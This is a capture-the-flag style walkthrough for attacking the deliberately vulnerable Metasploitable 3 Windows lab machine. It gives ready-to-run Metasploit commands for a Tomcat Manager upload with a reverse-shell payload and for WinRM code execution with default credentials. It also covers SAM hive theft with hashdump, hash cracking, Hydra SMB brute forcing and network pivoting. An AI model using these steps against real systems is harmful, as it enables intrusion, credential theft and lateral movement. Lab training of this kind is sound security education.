Metasploitable 3 Windows Walkthrough

This is a classic exploit: Apache Tomcat is listening on port 8282, and its Manager application accepts the default credentials tomcat/tomcat.

With Manager access you can deploy a WAR file containing a malicious JSP, which Tomcat will execute for you.

Using Metasploit for the Tomcat exploit:

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <Target_IP>
set RPORT 8282
set HttpUsername tomcat
set HttpPassword tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <Your_IP>
run

Result: you should receive a Meterpreter session running as NT AUTHORITY\SYSTEM. That is already a full compromise of the host, but for the sake of learning, let's look at the next vector. One caveat before moving on: this payload is the Java Meterpreter, which runs inside the JVM and does not carry the Windows-only extensions, so commands such as hashdump are not available in this session. Use the shell command to run the reg save steps below, or take the WinRM route to get a native Windows Meterpreter.

If you have valid credentials (the commands below use the Vagrant build's default account vagrant/vagrant; a hash captured from SMB would first have to be cracked to a password for this module), WinRM (TCP 5985 by default) gives a second way in and yields a native Windows Meterpreter:

msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 > set RHOSTS <Target_IP>
msf6 > set USERNAME vagrant
msf6 > set PASSWORD vagrant
msf6 > set FORCE_VBS true
msf6 > exploit

From a shell on the target (in Meterpreter, type shell), export the SAM and SYSTEM hives. This needs administrative or SYSTEM rights, and the saved copies should be deleted from the target when you are done:

reg save hklm\sam C:\sam.save
reg save hklm\system C:\system.save

Exit back to Meterpreter and pull the two files down:

download C:\sam.save /root/
download C:\system.save /root/

Then extract the hashes offline with samdump2 or impacket's secretsdump.py (run in local mode against the two saved hives). Note that these tools only extract the hashes; cracking them is a separate step with Hashcat or John the Ripper.

Setup note: unlike a simple VM download, Metasploitable 3 must be built locally with Packer and Vagrant before any of this, and the build files are where the default accounts and passwords used in this walkthrough are defined.

The holy grail of Windows post-exploitation is the SAM database, which holds the local account password hashes. From a native Windows Meterpreter session (the WinRM session above qualifies; the Java Meterpreter from the Tomcat exploit lacks this command), run getsystem if you are not already SYSTEM, then:

hashdump

You will see one line per local user in pwdump format (user:RID:LM hash:NT hash:::). Crack these offline using Hashcat (mode 1000 for NT hashes) or John the Ripper (--format=NT).

If you have no credentials at all, brute-force SMB with Hydra (the wordlist path below is Kali's default):

hydra -l administrator -P /usr/share/wordlists/rockyou.txt <Target_IP> smb

The password is often vagrant or mcpassword123 (check the Vagrant build files for the exact accounts and passwords). Keep in mind that on anything other than a lab box, SMB brute forcing can lock accounts out.

To pivot into the target's internal network from the Meterpreter session, add a route for that subnet and then background the session so other modules can use it:

run autoroute -s 192.168.1.0/24
background